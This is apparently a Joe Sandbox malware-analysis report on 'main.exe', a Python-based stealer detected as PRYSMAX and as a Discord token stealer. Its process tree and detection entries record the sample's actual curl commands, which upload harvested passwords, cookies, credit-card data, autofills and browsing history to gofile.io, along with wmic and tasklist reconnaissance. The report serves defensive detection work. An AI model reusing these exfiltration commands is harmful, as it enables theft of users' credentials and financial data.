Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
main.exe

Overview

General Information

Sample name:main.exe
Analysis ID:1579350
MD5:c0e4c8f676e781c9dd3d57ffa4f99111
SHA1:94a6f60949f38da538b5227722698dd880961bb2
SHA256:9c08a9aca45b1a4e36e0dc907eebead439bff5b2048b1f2248afa4f88520812d
Tags:exeuser-JaffaCakes118
Infos:

Detection

Python Stealer, Discord Token Stealer, PRYSMAX STEALER
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Discord Token Stealer
Yara detected PRYSMAX STEALER
Yara detected Telegram RAT
Found pyInstaller with non standard icon
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Generic Python Stealer
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • main.exe (PID: 7580 cmdline: "C:\Users\user\Desktop\main.exe" MD5: C0E4C8F676E781C9DD3D57FFA4F99111)
    • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • main.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\main.exe" MD5: C0E4C8F676E781C9DD3D57FFA4F99111)
      • cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 7808 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7272 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 7336 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1360 cmdline: C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 6112 cmdline: wmic path softwarelicensingservice get OA3xOriginalProductKey MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3384 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 5308 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 4432 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 396 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1016 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 3312 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 2828 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 5928 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1148 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 908 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1732 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 5804 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
    00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PRYSMAXSTEALERYara detected PRYSMAX STEALERJoe Security
      00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        Process Memory Space: main.exe PID: 7680JoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
          Process Memory Space: main.exe PID: 7680JoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
            Click to see the 2 entries

            Sigma Signatures

            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile", CommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe", ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 7680, ParentProcessName: main.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile", ProcessId: 7272, ProcessName: cmd.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: main.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: main.exeReversingLabs: Detection: 15%
            Source: main.exeVirustotal: Detection: 23%Perma Link
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\LICENSE.txtJump to behavior
            Source: main.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF733398840 FindFirstFileExW,FindClose,0_2_00007FF733398840
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF733397800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF733397800
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B2AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7333B2AE4
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 45.112.123.126 45.112.123.126
            Source: unknownDNS query: name: ip-api.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /servers HTTP/1.1Accept-Encoding: identityHost: api.gofile.ioUser-Agent: Python-urllib/3.11Connection: close
            Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflate, br, zstdAccept: */*Connection: keep-alive
            Source: global trafficHTTP traffic detected: GET /json/8.46.123.189?fields=192511 HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflate, br, zstdAccept: */*Connection: keep-alive
            Source: global trafficDNS traffic detected: DNS query: api.gofile.io
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
            Source: main.exe, 00000002.00000002.2026149433.000001E894D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/vcpython27
            Source: main.exe, 00000002.00000002.2026149433.000001E894D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/vcpython27Pw
            Source: main.exe, 00000002.00000003.2003283799.000001E893A4E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025233362.000001E894ABD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005040977.000001E893A57000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999083048.000001E894B30000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994075095.000001E894B9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996121577.000001E894BD2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005756876.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995247587.000001E894B2C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981923054.000001E894ABA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025577227.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998028650.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993380178.000001E894ABB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006444585.000001E894BB5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986551166.000001E894BCF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999790969.000001E893AD7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999164014.000001E893C42000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2009804647.000001E893C42000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986869706.000001E893C41000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981303330.000001E893A9B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997398066.000001E893A9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004470843.000001E893C42000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1796496956.000001E893A63000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787561207.000001E893969000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979378962.000001E893A63000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985312347.000001E89397C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986060081.000001E893A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
            Source: main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A73000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A73000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996080402.000001E8939A3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980653418.000001E893998000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976495976.000001E89398C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787354247.000001E893A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
            Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
            Source: main.exe, 00000002.00000002.2016672801.000001E893301000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988214568.000001E8945FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2000314344.000001E893301000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979172811.000001E8945FA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972460986.000001E8945F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2009080620.000001E893301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
            Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982186275.000001E893A5C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011637912.000001E893A60000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020289287.000001E893A60000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995854538.000001E893A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlO
            Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
            Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlHL
            Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
            Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
            Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0t
